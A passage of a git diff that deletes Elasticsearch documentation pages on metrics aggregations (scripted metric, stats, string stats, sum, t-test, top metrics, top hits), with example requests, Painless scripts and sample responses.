"query": { - "match_all": {} - }, - "aggs": { - "profit": { - "scripted_metric": { - "init_script": "state.transactions = []", <1> - "map_script": "state.transactions.add(doc.type.value == 'sale' ? doc.amount.value : -1 * doc.amount.value)", - "combine_script": "double profit = 0; for (t in state.transactions) { profit += t } return profit", - "reduce_script": "double profit = 0; for (a in states) { profit += a } return profit" - } - } - } -} --------------------------------------------------- -// TEST[setup:ledger] - -<1> `init_script` is an optional parameter, all other scripts are required. - -The above aggregation demonstrates how one would use the script aggregation compute the total profit from sale and cost transactions. - -The response for the above aggregation: - -[source,console-result] --------------------------------------------------- -{ - "took": 218, - ... - "aggregations": { - "profit": { - "value": 240.0 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 218/"took": $body.took/] -// TESTRESPONSE[s/\.\.\./"_shards": $body._shards, "hits": $body.hits, "timed_out": false,/] - -The above example can also be specified using stored scripts as follows: - -[source,console] --------------------------------------------------- -POST ledger/_search?size=0 -{ - "aggs": { - "profit": { - "scripted_metric": { - "init_script": { - "id": "my_init_script" - }, - "map_script": { - "id": "my_map_script" - }, - "combine_script": { - "id": "my_combine_script" - }, - "params": { - "field": "amount" <1> - }, - "reduce_script": { - "id": "my_reduce_script" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:ledger,stored_scripted_metric_script] - -<1> script parameters for `init`, `map` and `combine` scripts must be specified -in a global `params` object so that it can be shared between the scripts. - -//// -Verify this response as well but in a hidden block. - -[source,console-result] --------------------------------------------------- -{ - "took": 218, - ... - "aggregations": { - "profit": { - "value": 240.0 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 218/"took": $body.took/] -// TESTRESPONSE[s/\.\.\./"_shards": $body._shards, "hits": $body.hits, "timed_out": false,/] -//// - -For more details on specifying scripts see <>. - -[[scripted-metric-aggregation-return-types]] -==== Allowed return types - -Whilst any valid script object can be used within a single script, the scripts must return or store in the `state` object only the following types: - -* primitive types -* String -* Map (containing only keys and values of the types listed here) -* Array (containing elements of only the types listed here) - -[[scripted-metric-aggregation-scope]] -==== Scope of scripts - -The scripted metric aggregation uses scripts at 4 stages of its execution: - -init_script:: Executed prior to any collection of documents. Allows the aggregation to set up any initial state. -+ -In the above example, the `init_script` creates an array `transactions` in the `state` object. - -map_script:: Executed once per document collected. This is a required script. If no combine_script is specified, the resulting state - needs to be stored in the `state` object. -+ -In the above example, the `map_script` checks the value of the type field. If the value is 'sale' the value of the amount field -is added to the transactions array. If the value of the type field is not 'sale' the negated value of the amount field is added -to transactions. - -combine_script:: Executed once on each shard after document collection is complete. This is a required script. Allows the aggregation to - consolidate the state returned from each shard. -+ -In the above example, the `combine_script` iterates through all the stored transactions, summing the values in the `profit` variable -and finally returns `profit`. - -reduce_script:: Executed once on the coordinating node after all shards have returned their results. This is a required script. The - script is provided with access to a variable `states` which is an array of the result of the combine_script on each - shard. -+ -In the above example, the `reduce_script` iterates through the `profit` returned by each shard summing the values before returning the -final combined profit which will be returned in the response of the aggregation. - -[[scripted-metric-aggregation-example]] -==== Worked example - -Imagine a situation where you index the following documents into an index with 2 shards: - -[source,console] --------------------------------------------------- -PUT /transactions/_bulk?refresh -{"index":{"_id":1}} -{"type": "sale","amount": 80} -{"index":{"_id":2}} -{"type": "cost","amount": 10} -{"index":{"_id":3}} -{"type": "cost","amount": 30} -{"index":{"_id":4}} -{"type": "sale","amount": 130} --------------------------------------------------- - -Lets say that documents 1 and 3 end up on shard A and documents 2 and 4 end up on shard B. The following is a breakdown of what the aggregation result is -at each stage of the example above. - -===== Before init_script - -`state` is initialized as a new empty object. - -[source,js] --------------------------------------------------- -"state" : {} --------------------------------------------------- -// NOTCONSOLE - -===== After init_script - -This is run once on each shard before any document collection is performed, and so we will have a copy on each shard: - -Shard A:: -+ -[source,js] --------------------------------------------------- -"state" : { - "transactions" : [] -} --------------------------------------------------- -// NOTCONSOLE - -Shard B:: -+ -[source,js] --------------------------------------------------- -"state" : { - "transactions" : [] -} --------------------------------------------------- -// NOTCONSOLE - -===== After map_script - -Each shard collects its documents and runs the map_script on each document that is collected: - -Shard A:: -+ -[source,js] --------------------------------------------------- -"state" : { - "transactions" : [ 80, -30 ] -} --------------------------------------------------- -// NOTCONSOLE - -Shard B:: -+ -[source,js] --------------------------------------------------- -"state" : { - "transactions" : [ -10, 130 ] -} --------------------------------------------------- -// NOTCONSOLE - -===== After combine_script - -The combine_script is executed on each shard after document collection is complete and reduces all the transactions down to a single profit figure for each -shard (by summing the values in the transactions array) which is passed back to the coordinating node: - -Shard A:: 50 -Shard B:: 120 - -===== After reduce_script - -The reduce_script receives a `states` array containing the result of the combine script for each shard: - -[source,js] --------------------------------------------------- -"states" : [ - 50, - 120 -] --------------------------------------------------- -// NOTCONSOLE - -It reduces the responses for the shards down to a final overall profit figure (by summing the values) and returns this as the result of the aggregation to -produce the response: - -[source,js] --------------------------------------------------- -{ - ... - - "aggregations": { - "profit": { - "value": 170 - } - } -} --------------------------------------------------- -// NOTCONSOLE - -[[scripted-metric-aggregation-parameters]] -==== Other parameters - -[horizontal] -params:: Optional. An object whose contents will be passed as variables to the `init_script`, `map_script` and `combine_script`. This can be - useful to allow the user to control the behavior of the aggregation and for storing state between the scripts. If this is not specified, - the default is the equivalent of providing: -+ -[source,js] --------------------------------------------------- -"params" : {} --------------------------------------------------- -// NOTCONSOLE - -[[scripted-metric-aggregation-empty-buckets]] -==== Empty buckets - -If a parent bucket of the scripted metric aggregation does not collect any documents an empty aggregation response will be returned from the -shard with a `null` value. In this case the `reduce_script`'s `states` variable will contain `null` as a response from that shard. -`reduce_script`'s should therefore expect and deal with `null` responses from shards. diff --git a/docs/reference/aggregations/metrics/stats-aggregation.asciidoc b/docs/reference/aggregations/metrics/stats-aggregation.asciidoc deleted file mode 100644 index d02a7ea2a5b..00000000000 --- a/docs/reference/aggregations/metrics/stats-aggregation.asciidoc +++ /dev/null @@ -1,139 +0,0 @@ -[[search-aggregations-metrics-stats-aggregation]] -=== Stats aggregation -++++ -Stats -++++ - -A `multi-value` metrics aggregation that computes stats over numeric values extracted from the aggregated documents. These values can be extracted either from specific numeric fields in the documents, or be generated by a provided script. - -The stats that are returned consist of: `min`, `max`, `sum`, `count` and `avg`. - -Assuming the data consists of documents representing exams grades (between 0 and 100) of students - -[source,console] --------------------------------------------------- -POST /exams/_search?size=0 -{ - "aggs": { - "grades_stats": { "stats": { "field": "grade" } } - } -} --------------------------------------------------- -// TEST[setup:exams] - -The above aggregation computes the grades statistics over all documents. The aggregation type is `stats` and the `field` setting defines the numeric field of the documents the stats will be computed on. The above will return the following: - - -[source,console-result] --------------------------------------------------- -{ - ... - - "aggregations": { - "grades_stats": { - "count": 2, - "min": 50.0, - "max": 100.0, - "avg": 75.0, - "sum": 150.0 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -The name of the aggregation (`grades_stats` above) also serves as the key by which the aggregation result can be retrieved from the returned response. - -==== Script - -Computing the grades stats based on a script: - -[source,console] --------------------------------------------------- -POST /exams/_search?size=0 -{ - "aggs": { - "grades_stats": { - "stats": { - "script": { - "lang": "painless", - "source": "doc['grade'].value" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:exams] - -This will interpret the `script` parameter as an `inline` script with the `painless` script language and no script parameters. To use a stored script use the following syntax: - -[source,console] --------------------------------------------------- -POST /exams/_search?size=0 -{ - "aggs": { - "grades_stats": { - "stats": { - "script": { - "id": "my_script", - "params": { - "field": "grade" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:exams,stored_example_script] - -===== Value Script - -It turned out that the exam was way above the level of the students and a grade correction needs to be applied. We can use a value script to get the new stats: - -[source,console] --------------------------------------------------- -POST /exams/_search?size=0 -{ - "aggs": { - "grades_stats": { - "stats": { - "field": "grade", - "script": { - "lang": "painless", - "source": "_value * params.correction", - "params": { - "correction": 1.2 - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:exams] - -==== Missing value - -The `missing` parameter defines how documents that are missing a value should be treated. -By default they will be ignored but it is also possible to treat them as if they -had a value. - -[source,console] --------------------------------------------------- -POST /exams/_search?size=0 -{ - "aggs": { - "grades_stats": { - "stats": { - "field": "grade", - "missing": 0 <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:exams] - -<1> Documents without a value in the `grade` field will fall into the same bucket as documents that have the value `0`. diff --git a/docs/reference/aggregations/metrics/string-stats-aggregation.asciidoc b/docs/reference/aggregations/metrics/string-stats-aggregation.asciidoc deleted file mode 100644 index 41a5283b273..00000000000 --- a/docs/reference/aggregations/metrics/string-stats-aggregation.asciidoc +++ /dev/null @@ -1,223 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[search-aggregations-metrics-string-stats-aggregation]] -=== String stats aggregation -++++ -String stats -++++ - -A `multi-value` metrics aggregation that computes statistics over string values extracted from the aggregated documents. -These values can be retrieved either from specific `keyword` fields in the documents or can be generated by a provided script. - -WARNING: Using scripts can result in slower search speeds. See -<>. - -The string stats aggregation returns the following results: - -* `count` - The number of non-empty fields counted. -* `min_length` - The length of the shortest term. -* `max_length` - The length of the longest term. -* `avg_length` - The average length computed over all terms. -* `entropy` - The {wikipedia}/Entropy_(information_theory)[Shannon Entropy] value computed over all terms collected by -the aggregation. Shannon entropy quantifies the amount of information contained in the field. It is a very useful metric for -measuring a wide range of properties of a data set, such as diversity, similarity, randomness etc. - -For example: - -[source,console] --------------------------------------------------- -POST /my-index-000001/_search?size=0 -{ - "aggs": { - "message_stats": { "string_stats": { "field": "message.keyword" } } - } -} --------------------------------------------------- -// TEST[setup:messages] - -The above aggregation computes the string statistics for the `message` field in all documents. The aggregation type -is `string_stats` and the `field` parameter defines the field of the documents the stats will be computed on. -The above will return the following: - -[source,console-result] --------------------------------------------------- -{ - ... - - "aggregations": { - "message_stats": { - "count": 5, - "min_length": 24, - "max_length": 30, - "avg_length": 28.8, - "entropy": 3.94617750050791 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -The name of the aggregation (`message_stats` above) also serves as the key by which the aggregation result can be retrieved from -the returned response. - -==== Character distribution - -The computation of the Shannon Entropy value is based on the probability of each character appearing in all terms collected -by the aggregation. To view the probability distribution for all characters, we can add the `show_distribution` (default: `false`) parameter. - -[source,console] --------------------------------------------------- -POST /my-index-000001/_search?size=0 -{ - "aggs": { - "message_stats": { - "string_stats": { - "field": "message.keyword", - "show_distribution": true <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:messages] - -<1> Set the `show_distribution` parameter to `true`, so that probability distribution for all characters is returned in the results. - -[source,console-result] --------------------------------------------------- -{ - ... - - "aggregations": { - "message_stats": { - "count": 5, - "min_length": 24, - "max_length": 30, - "avg_length": 28.8, - "entropy": 3.94617750050791, - "distribution": { - " ": 0.1527777777777778, - "e": 0.14583333333333334, - "s": 0.09722222222222222, - "m": 0.08333333333333333, - "t": 0.0763888888888889, - "h": 0.0625, - "a": 0.041666666666666664, - "i": 0.041666666666666664, - "r": 0.041666666666666664, - "g": 0.034722222222222224, - "n": 0.034722222222222224, - "o": 0.034722222222222224, - "u": 0.034722222222222224, - "b": 0.027777777777777776, - "w": 0.027777777777777776, - "c": 0.013888888888888888, - "E": 0.006944444444444444, - "l": 0.006944444444444444, - "1": 0.006944444444444444, - "2": 0.006944444444444444, - "3": 0.006944444444444444, - "4": 0.006944444444444444, - "y": 0.006944444444444444 - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -The `distribution` object shows the probability of each character appearing in all terms. The characters are sorted by descending probability. - -==== Script - -Computing the message string stats based on a script: - -[source,console] --------------------------------------------------- -POST /my-index-000001/_search?size=0 -{ - "aggs": { - "message_stats": { - "string_stats": { - "script": { - "lang": "painless", - "source": "doc['message.keyword'].value" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:messages] - -This will interpret the `script` parameter as an `inline` script with the `painless` script language and no script parameters. -To use a stored script use the following syntax: - -[source,console] --------------------------------------------------- -POST /my-index-000001/_search?size=0 -{ - "aggs": { - "message_stats": { - "string_stats": { - "script": { - "id": "my_script", - "params": { - "field": "message.keyword" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:messages,stored_example_script] - -===== Value Script - -We can use a value script to modify the message (eg we can add a prefix) and compute the new stats: - -[source,console] --------------------------------------------------- -POST /my-index-000001/_search?size=0 -{ - "aggs": { - "message_stats": { - "string_stats": { - "field": "message.keyword", - "script": { - "lang": "painless", - "source": "params.prefix + _value", - "params": { - "prefix": "Message: " - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:messages] - -==== Missing value - -The `missing` parameter defines how documents that are missing a value should be treated. -By default they will be ignored but it is also possible to treat them as if they had a value. - -[source,console] --------------------------------------------------- -POST /my-index-000001/_search?size=0 -{ - "aggs": { - "message_stats": { - "string_stats": { - "field": "message.keyword", - "missing": "[empty message]" <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:messages] - -<1> Documents without a value in the `message` field will be treated as documents that have the value `[empty message]`. diff --git a/docs/reference/aggregations/metrics/sum-aggregation.asciidoc b/docs/reference/aggregations/metrics/sum-aggregation.asciidoc deleted file mode 100644 index c7bd15067c2..00000000000 --- a/docs/reference/aggregations/metrics/sum-aggregation.asciidoc +++ /dev/null @@ -1,216 +0,0 @@ -[[search-aggregations-metrics-sum-aggregation]] -=== Sum aggregation -++++ -Sum -++++ - -A `single-value` metrics aggregation that sums up numeric values that are extracted from the aggregated documents. -These values can be extracted either from specific numeric or <> fields in the documents, -or be generated by a provided script. - -Assuming the data consists of documents representing sales records we can sum -the sale price of all hats with: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "query": { - "constant_score": { - "filter": { - "match": { "type": "hat" } - } - } - }, - "aggs": { - "hat_prices": { "sum": { "field": "price" } } - } -} --------------------------------------------------- -// TEST[setup:sales] - -Resulting in: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "hat_prices": { - "value": 450.0 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -The name of the aggregation (`hat_prices` above) also serves as the key by which the aggregation result can be retrieved from the returned response. - -==== Script - -We could also use a script to fetch the sales price: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "query": { - "constant_score": { - "filter": { - "match": { "type": "hat" } - } - } - }, - "aggs": { - "hat_prices": { - "sum": { - "script": { - "source": "doc.price.value" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -This will interpret the `script` parameter as an `inline` script with the `painless` script language and no script parameters. To use a stored script use the following syntax: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "query": { - "constant_score": { - "filter": { - "match": { "type": "hat" } - } - } - }, - "aggs": { - "hat_prices": { - "sum": { - "script": { - "id": "my_script", - "params": { - "field": "price" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales,stored_example_script] - -===== Value Script - -It is also possible to access the field value from the script using `_value`. -For example, this will sum the square of the prices for all hats: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "query": { - "constant_score": { - "filter": { - "match": { "type": "hat" } - } - } - }, - "aggs": { - "square_hats": { - "sum": { - "field": "price", - "script": { - "source": "_value * _value" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -==== Missing value - -The `missing` parameter defines how documents that are missing a value should -be treated. By default documents missing the value will be ignored but it is -also possible to treat them as if they had a value. For example, this treats -all hat sales without a price as being `100`. - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "query": { - "constant_score": { - "filter": { - "match": { "type": "hat" } - } - } - }, - "aggs": { - "hat_prices": { - "sum": { - "field": "price", - "missing": 100 <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -[[search-aggregations-metrics-sum-aggregation-histogram-fields]] -==== Histogram fields - -When sum is computed on <>, the result of the aggregation is the sum of all elements in the `values` -array multiplied by the number in the same position in the `counts` array. - -For example, for the following index that stores pre-aggregated histograms with latency metrics for different networks: - -[source,console] --------------------------------------------------- -PUT metrics_index/_doc/1 -{ - "network.name" : "net-1", - "latency_histo" : { - "values" : [0.1, 0.2, 0.3, 0.4, 0.5], <1> - "counts" : [3, 7, 23, 12, 6] <2> - } -} - -PUT metrics_index/_doc/2 -{ - "network.name" : "net-2", - "latency_histo" : { - "values" : [0.1, 0.2, 0.3, 0.4, 0.5], <1> - "counts" : [8, 17, 8, 7, 6] <2> - } -} - -POST /metrics_index/_search?size=0 -{ - "aggs" : { - "total_latency" : { "sum" : { "field" : "latency_histo" } } - } -} --------------------------------------------------- - -For each histogram field the `sum` aggregation will multiply each number in the `values` array <1> multiplied by its associated count -in the `counts` array <2>. Eventually, it will add all values for all histograms and return the following result: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "total_latency": { - "value": 28.8 - } - } -} --------------------------------------------------- -// TESTRESPONSE[skip:test not setup] diff --git a/docs/reference/aggregations/metrics/t-test-aggregation.asciidoc b/docs/reference/aggregations/metrics/t-test-aggregation.asciidoc deleted file mode 100644 index 969ce251041..00000000000 --- a/docs/reference/aggregations/metrics/t-test-aggregation.asciidoc +++ /dev/null @@ -1,180 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[search-aggregations-metrics-ttest-aggregation]] -=== T-test aggregation -++++ -T-test -++++ - -A `t_test` metrics aggregation that performs a statistical hypothesis test in which the test statistic follows a Student's t-distribution -under the null hypothesis on numeric values extracted from the aggregated documents or generated by provided scripts. In practice, this -will tell you if the difference between two population means are statistically significant and did not occur by chance alone. - -==== Syntax - -A `t_test` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "t_test": { - "a": "value_before", - "b": "value_after", - "type": "paired" - } -} --------------------------------------------------- -// NOTCONSOLE - -Assuming that we have a record of node start up times before and after upgrade, let's look at a t-test to see if upgrade affected -the node start up time in a meaningful way. - -[source,console] --------------------------------------------------- -GET node_upgrade/_search -{ - "size": 0, - "aggs": { - "startup_time_ttest": { - "t_test": { - "a": { "field": "startup_time_before" }, <1> - "b": { "field": "startup_time_after" }, <2> - "type": "paired" <3> - } - } - } -} --------------------------------------------------- -// TEST[setup:node_upgrade] -<1> The field `startup_time_before` must be a numeric field. -<2> The field `startup_time_after` must be a numeric field. -<3> Since we have data from the same nodes, we are using paired t-test. - -The response will return the p-value or probability value for the test. It is the probability of obtaining results at least as extreme as -the result processed by the aggregation, assuming that the null hypothesis is correct (which means there is no difference between -population means). Smaller p-value means the null hypothesis is more likely to be incorrect and population means are indeed different. - -[source,console-result] --------------------------------------------------- -{ - ... - - "aggregations": { - "startup_time_ttest": { - "value": 0.1914368843365979 <1> - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] -<1> The p-value. - -==== T-Test Types - -The `t_test` aggregation supports unpaired and paired two-sample t-tests. The type of the test can be specified using the `type` parameter: - -`"type": "paired"`:: performs paired t-test -`"type": "homoscedastic"`:: performs two-sample equal variance test -`"type": "heteroscedastic"`:: performs two-sample unequal variance test (this is default) - -==== Filters - -It is also possible to run unpaired t-test on different sets of records using filters. For example, if we want to test the difference -of startup times before upgrade between two different groups of nodes, we use the same field `startup_time_before` by separate groups of -nodes using terms filters on the group name field: - -[source,console] --------------------------------------------------- -GET node_upgrade/_search -{ - "size": 0, - "aggs": { - "startup_time_ttest": { - "t_test": { - "a": { - "field": "startup_time_before", <1> - "filter": { - "term": { - "group": "A" <2> - } - } - }, - "b": { - "field": "startup_time_before", <3> - "filter": { - "term": { - "group": "B" <4> - } - } - }, - "type": "heteroscedastic" <5> - } - } - } -} --------------------------------------------------- -// TEST[setup:node_upgrade] -<1> The field `startup_time_before` must be a numeric field. -<2> Any query that separates two groups can be used here. -<3> We are using the same field -<4> but we are using different filters. -<5> Since we have data from different nodes, we cannot use paired t-test. - - -[source,console-result] --------------------------------------------------- -{ - ... - - "aggregations": { - "startup_time_ttest": { - "value": 0.2981858007281437 <1> - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] -<1> The p-value. - -In this example, we are using the same fields for both populations. However this is not a requirement and different fields and even -combination of fields and scripts can be used. Populations don't have to be in the same index either. If data sets are located in different -indices, the term filter on the <> field can be used to select populations. - -==== Script - -The `t_test` metric supports scripting. For example, if we need to adjust out load times for the before values, we could use -a script to recalculate them on-the-fly: - -[source,console] --------------------------------------------------- -GET node_upgrade/_search -{ - "size": 0, - "aggs": { - "startup_time_ttest": { - "t_test": { - "a": { - "script": { - "lang": "painless", - "source": "doc['startup_time_before'].value - params.adjustment", <1> - "params": { - "adjustment": 10 <2> - } - } - }, - "b": { - "field": "startup_time_after" <3> - }, - "type": "paired" - } - } - } -} --------------------------------------------------- -// TEST[setup:node_upgrade] - -<1> The `field` parameter is replaced with a `script` parameter, which uses the -script to generate values which percentiles are calculated on. -<2> Scripting supports parameterized input just like any other script. -<3> We can mix scripts and fields. - diff --git a/docs/reference/aggregations/metrics/top-metrics-aggregation.asciidoc b/docs/reference/aggregations/metrics/top-metrics-aggregation.asciidoc deleted file mode 100644 index 9b9d5c49b01..00000000000 --- a/docs/reference/aggregations/metrics/top-metrics-aggregation.asciidoc +++ /dev/null @@ -1,404 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[search-aggregations-metrics-top-metrics]] -=== Top metrics aggregation -++++ -Top metrics -++++ - -The `top_metrics` aggregation selects metrics from the document with the largest or smallest "sort" -value. For example, this gets the value of the `m` field on the document with the largest value of `s`: - -[source,console,id=search-aggregations-metrics-top-metrics-simple] ----- -POST /test/_bulk?refresh -{"index": {}} -{"s": 1, "m": 3.1415} -{"index": {}} -{"s": 2, "m": 1.0} -{"index": {}} -{"s": 3, "m": 2.71828} -POST /test/_search?filter_path=aggregations -{ - "aggs": { - "tm": { - "top_metrics": { - "metrics": {"field": "m"}, - "sort": {"s": "desc"} - } - } - } -} ----- - -Which returns: - -[source,js] ----- -{ - "aggregations": { - "tm": { - "top": [ {"sort": [3], "metrics": {"m": 2.718280076980591 } } ] - } - } -} ----- -// TESTRESPONSE - -`top_metrics` is fairly similar to <> -in spirit but because it is more limited it is able to do its job using less memory and is often -faster. - -==== `sort` - -The `sort` field in the metric request functions exactly the same as the `sort` field in the -<> request except: -* It can't be used on <>, <>, <>, -<>, or <> fields. -* It only supports a single sort value so which document wins ties is not specified. - -The metrics that the aggregation returns is the first hit that would be returned by the search -request. So, - -`"sort": {"s": "desc"}`:: gets metrics from the document with the highest `s` -`"sort": {"s": "asc"}`:: gets the metrics from the document with the lowest `s` -`"sort": {"_geo_distance": {"location": "35.7796, -78.6382"}}`:: - gets metrics from the documents with `location` *closest* to `35.7796, -78.6382` -`"sort": "_score"`:: gets metrics from the document with the highest score - -==== `metrics` - -`metrics` selects the fields of the "top" document to return. You can request -a single metric with something like `"metric": {"field": "m"}` or multiple -metrics by requesting a list of metrics like `"metric": [{"field": "m"}, {"field": "i"}`. -Here is a more complete example: - -[source,console,id=search-aggregations-metrics-top-metrics-list-of-metrics] ----- -PUT /test -{ - "mappings": { - "properties": { - "d": {"type": "date"} - } - } -} -POST /test/_bulk?refresh -{"index": {}} -{"s": 1, "m": 3.1415, "i": 1, "d": "2020-01-01T00:12:12Z"} -{"index": {}} -{"s": 2, "m": 1.0, "i": 6, "d": "2020-01-02T00:12:12Z"} -{"index": {}} -{"s": 3, "m": 2.71828, "i": -12, "d": "2019-12-31T00:12:12Z"} -POST /test/_search?filter_path=aggregations -{ - "aggs": { - "tm": { - "top_metrics": { - "metrics": [ - {"field": "m"}, - {"field": "i"}, - {"field": "d"} - ], - "sort": {"s": "desc"} - } - } - } -} ----- - -Which returns: - -[source,js] ----- -{ - "aggregations": { - "tm": { - "top": [ { - "sort": [3], - "metrics": { - "m": 2.718280076980591, - "i": -12, - "d": "2019-12-31T00:12:12.000Z" - } - } ] - } - } -} ----- -// TESTRESPONSE - -==== `size` - -`top_metrics` can return the top few document's worth of metrics using the size parameter: - -[source,console,id=search-aggregations-metrics-top-metrics-size] ----- -POST /test/_bulk?refresh -{"index": {}} -{"s": 1, "m": 3.1415} -{"index": {}} -{"s": 2, "m": 1.0} -{"index": {}} -{"s": 3, "m": 2.71828} -POST /test/_search?filter_path=aggregations -{ - "aggs": { - "tm": { - "top_metrics": { - "metrics": {"field": "m"}, - "sort": {"s": "desc"}, - "size": 3 - } - } - } -} ----- - -Which returns: - -[source,js] ----- -{ - "aggregations": { - "tm": { - "top": [ - {"sort": [3], "metrics": {"m": 2.718280076980591 } }, - {"sort": [2], "metrics": {"m": 1.0 } }, - {"sort": [1], "metrics": {"m": 3.1414999961853027 } } - ] - } - } -} ----- -// TESTRESPONSE - -The default `size` is 1. The maximum default size is `10` because the aggregation's -working storage is "dense", meaning we allocate `size` slots for every bucket. `10` -is a *very* conservative default maximum and you can raise it if you need to by -changing the `top_metrics_max_size` index setting. But know that large sizes can -take a fair bit of memory, especially if they are inside of an aggregation which -makes many buckes like a large -<>. If -you till want to raise it, use something like: - -[source,console] ----- -PUT /test/_settings -{ - "top_metrics_max_size": 100 -} ----- -// TEST[continued] - -NOTE: If `size` is more than `1` the `top_metrics` aggregation can't be the *target* of a sort. - -==== Examples - -[[search-aggregations-metrics-top-metrics-example-terms]] -===== Use with terms - -This aggregation should be quite useful inside of <> -aggregation, to, say, find the last value reported by each server. - -[source,console,id=search-aggregations-metrics-top-metrics-terms] ----- -PUT /node -{ - "mappings": { - "properties": { - "ip": {"type": "ip"}, - "date": {"type": "date"} - } - } -} -POST /node/_bulk?refresh -{"index": {}} -{"ip": "192.168.0.1", "date": "2020-01-01T01:01:01", "m": 1} -{"index": {}} -{"ip": "192.168.0.1", "date": "2020-01-01T02:01:01", "m": 2} -{"index": {}} -{"ip": "192.168.0.2", "date": "2020-01-01T02:01:01", "m": 3} -POST /node/_search?filter_path=aggregations -{ - "aggs": { - "ip": { - "terms": { - "field": "ip" - }, - "aggs": { - "tm": { - "top_metrics": { - "metrics": {"field": "m"}, - "sort": {"date": "desc"} - } - } - } - } - } -} ----- - -Which returns: - -[source,js] ----- -{ - "aggregations": { - "ip": { - "buckets": [ - { - "key": "192.168.0.1", - "doc_count": 2, - "tm": { - "top": [ {"sort": ["2020-01-01T02:01:01.000Z"], "metrics": {"m": 2 } } ] - } - }, - { - "key": "192.168.0.2", - "doc_count": 1, - "tm": { - "top": [ {"sort": ["2020-01-01T02:01:01.000Z"], "metrics": {"m": 3 } } ] - } - } - ], - "doc_count_error_upper_bound": 0, - "sum_other_doc_count": 0 - } - } -} ----- -// TESTRESPONSE - -Unlike `top_hits`, you can sort buckets by the results of this metric: - -[source,console] ----- -POST /node/_search?filter_path=aggregations -{ - "aggs": { - "ip": { - "terms": { - "field": "ip", - "order": {"tm.m": "desc"} - }, - "aggs": { - "tm": { - "top_metrics": { - "metrics": {"field": "m"}, - "sort": {"date": "desc"} - } - } - } - } - } -} ----- -// TEST[continued] - -Which returns: - -[source,js] ----- -{ - "aggregations": { - "ip": { - "buckets": [ - { - "key": "192.168.0.2", - "doc_count": 1, - "tm": { - "top": [ {"sort": ["2020-01-01T02:01:01.000Z"], "metrics": {"m": 3 } } ] - } - }, - { - "key": "192.168.0.1", - "doc_count": 2, - "tm": { - "top": [ {"sort": ["2020-01-01T02:01:01.000Z"], "metrics": {"m": 2 } } ] - } - } - ], - "doc_count_error_upper_bound": 0, - "sum_other_doc_count": 0 - } - } -} ----- -// TESTRESPONSE - -===== Mixed sort types - -Sorting `top_metrics` by a field that has different types across different -indices producs somewhat suprising results: floating point fields are -always sorted independantly of whole numbered fields. - -[source,console,id=search-aggregations-metrics-top-metrics-mixed-sort] ----- -POST /test/_bulk?refresh -{"index": {"_index": "test1"}} -{"s": 1, "m": 3.1415} -{"index": {"_index": "test1"}} -{"s": 2, "m": 1} -{"index": {"_index": "test2"}} -{"s": 3.1, "m": 2.71828} -POST /test*/_search?filter_path=aggregations -{ - "aggs": { - "tm": { - "top_metrics": { - "metrics": {"field": "m"}, - "sort": {"s": "asc"} - } - } - } -} ----- - -Which returns: - -[source,js] ----- -{ - "aggregations": { - "tm": { - "top": [ {"sort": [3.0999999046325684], "metrics": {"m": 2.718280076980591 } } ] - } - } -} ----- -// TESTRESPONSE - -While this is better than an error it *probably* isn't what you were going for. -While it does lose some precision, you can explictly cast the whole number -fields to floating points with something like: - -[source,console] ----- -POST /test*/_search?filter_path=aggregations -{ - "aggs": { - "tm": { - "top_metrics": { - "metrics": {"field": "m"}, - "sort": {"s": {"order": "asc", "numeric_type": "double"}} - } - } - } -} ----- -// TEST[continued] - -Which returns the much more expected: - -[source,js] ----- -{ - "aggregations": { - "tm": { - "top": [ {"sort": [1.0], "metrics": {"m": 3.1414999961853027 } } ] - } - } -} ----- -// TESTRESPONSE diff --git a/docs/reference/aggregations/metrics/tophits-aggregation.asciidoc b/docs/reference/aggregations/metrics/tophits-aggregation.asciidoc deleted file mode 100644 index 4136868d4ba..00000000000 --- a/docs/reference/aggregations/metrics/tophits-aggregation.asciidoc +++ /dev/null @@ -1,422 +0,0 @@ -[[search-aggregations-metrics-top-hits-aggregation]] -=== Top hits aggregation -++++ -Top hits -++++ - -A `top_hits` metric aggregator keeps track of the most relevant document being aggregated. This aggregator is intended -to be used as a sub aggregator, so that the top matching documents can be aggregated per bucket. - -TIP: We do not recommend using `top_hits` as a top-level aggregation. If you -want to group search hits, use the <> 